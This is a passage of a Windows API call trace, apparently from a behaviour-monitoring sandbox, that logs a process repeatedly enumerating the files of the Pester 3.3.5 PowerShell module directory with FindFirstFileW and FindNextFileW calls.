ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0283.027] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0283.027] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0283.027] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0283.027] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0283.028] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0283.028] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0283.028] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0283.028] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0283.028] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0283.028] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0283.029] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.029] FindClose (in: hFindFile=0x25b73cd2bb0 | out: hFindFile=0x25b73cd2bb0) returned 1 [0283.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0283.029] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2c10 [0283.029] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.030] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0283.030] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0283.030] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0283.030] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0283.030] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0283.030] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0283.031] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0283.031] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0283.031] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0283.031] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0283.031] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0283.032] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0283.032] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0283.032] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0283.032] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0283.032] FindClose (in: hFindFile=0x25b73cd2c10 | out: hFindFile=0x25b73cd2c10) returned 1 [0283.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7f0) returned 1 [0283.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7b0) returned 1 [0283.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c480, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0283.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8d0) returned 1 [0283.033] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c9b0 | out: lpFileInformation=0x653ef8c9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0283.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0283.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0283.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0283.033] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c630 | out: lpFindFileData=0x653ef8c630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2c10 [0283.033] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.034] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0283.034] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0283.034] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0283.034] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0283.034] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0283.034] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0283.035] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0283.035] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0283.035] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0283.035] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0283.035] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0283.035] FindNextFileW (in: hFindFile=0x25b73cd2c10, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, 